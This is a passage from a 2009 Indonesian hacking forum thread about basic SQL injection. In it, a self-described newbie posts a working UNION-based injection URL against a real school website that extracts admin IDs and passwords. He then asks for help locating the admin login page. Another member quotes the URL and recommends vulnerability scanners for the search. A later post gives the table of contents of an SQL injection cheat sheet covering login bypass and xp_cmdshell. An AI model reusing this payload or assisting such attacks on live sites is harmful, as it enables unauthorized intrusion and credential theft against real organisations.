Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

The largest cyber security forum in Indonesia with more than 129000 members
http://xcode.or.id/forum/

TEknIk MEndasar Sql Injection Season 1

http://xcode.or.id/forum/viewtopic.php?f=99&t=35262

Page 3 of 5

Re: TEknIk MEndasar Sql Injection Season 1

Posted: Sat Jul 04, 2009 9:28 pm
by oki_machine
ijin nyobain kak!
:D :D :D :D :D

Re: TEknIk MEndasar Sql Injection Season 1

Posted: Sat Jul 11, 2009 1:00 pm
by vodork
numpang corat coret di siani ya om :D :D
daripada bikin tpik baru malah nyampah :D

Code: Select all

http://www.sman1karangnongko-klt.sch.id/berita.php?ID=-31+union+all+select+1,2,3,group_concat(fs_id,0x3a,fs_password,0x3a,fs_kat),5,6,7,8,9,10+from+t_admin--
belum nemu'n halaman loginnya :roll: :roll:
udah tak ubek2 gak nemu'n juga :lol: :lol:
ada yang bisa?
mohon bimbinganya....
aku masih newbie...
thax b4...

Re: TEknIk MEndasar Sql Injection Season 1

Posted: Sat Jul 11, 2009 8:14 pm
by tukangtidurterus
maknyos tuttsnya :D

Re: TEknIk MEndasar Sql Injection Season 1

Posted: Sun Jul 12, 2009 8:34 am
by adi0ranye
vodork wrote:numpang corat coret di siani ya om :D :D
daripada bikin tpik baru malah nyampah :D

Code: Select all

http://www.sman1karangnongko-klt.sch.id/berita.php?ID=-31+union+all+select+1,2,3,group_concat(fs_id,0x3a,fs_password,0x3a,fs_kat),5,6,7,8,9,10+from+t_admin--
belum nemu'n halaman loginnya :roll: :roll:
udah tak ubek2 gak nemu'n juga :lol: :lol:
ada yang bisa?
mohon bimbinganya....
aku masih newbie...
thax b4...
Coba pake nikto atau acunetix bro cara cari login pagenya...

Re: TEknIk MEndasar Sql Injection Season 1

Posted: Mon Jul 13, 2009 2:17 pm
by vodork
Ok ok'
thx langsung menuju sasaran

Re: TEknIk MEndasar Sql Injection Season 1

Posted: Mon Jul 13, 2009 2:20 pm
by r-newbie
ane dah pake linux, jalanin perl-nya gimana bro? sori nubie :oops:

Re: TEknIk MEndasar Sql Injection Season 1

Posted: Wed Jul 15, 2009 12:30 am
by vodork
udah tak dunlud om tapi cara makenya rumit banget :roll: :roll:
maklum newbie
bisa tolong cari'n halaman loginx gak :D :D

Re: TEknIk MEndasar Sql Injection Season 1

Posted: Tue Aug 18, 2009 4:45 pm
by zienuxer
wah aq masih bingung neh..nyimak aj dulu kali :mrgreen: :mrgreen:

SQL Injection Cheat Sheet

Posted: Mon Aug 24, 2009 12:34 am
by Gumux_1107
Berhubung aku tadi dapet pas mau latian SQL inject (maklum, belom pernah slesei latian sql inject gara2 takut :D), dapat ini :D Karna aku juga lagi ngg enak bikin tread baru yang malah nambah server tambah penuh, mendingan aku taruh disini aj :D

Code: Select all

[size=150][b]Table Of Contents[/b][/size]

   1. About SQL Injection Cheat Sheet
   2. Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks
         1. Line Comments
                * SQL Injection Attack Samples
         2. Inline Comments
                * Classical Inline Comment SQL Injection Attack Samples
                * MySQL Version Detection Sample Attacks
         3. Stacking Queries
                * Language / Database Stacked Query Support Table
                * About MySQL and PHP
                * Stacked SQL Injection Attack Samples
         4. If Statements
                * MySQL If Statement
                * SQL Server If Statement
                * If Statement SQL Injection Attack Samples
         5. Using Integers
         6. String  Operations
                * String Concatenation
         7. Strings without Quotes
                * Hex based SQL Injection Samples
         8. String Modification & Related
         9. Union Injections
                * UNION – Fixing Language Issues
        10. Bypassing Login Screens
        11. Enabling xp_cmdshell in SQL Server 2005
        12. Other parts are not so well formatted but check out by yourself, drafts, notes and stuff, scroll down and see.
Url: http://ferruh.mavituna.com/sql-injectio ... sheet-oku/
All times are UTC+07:00
Page 3 of 5
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/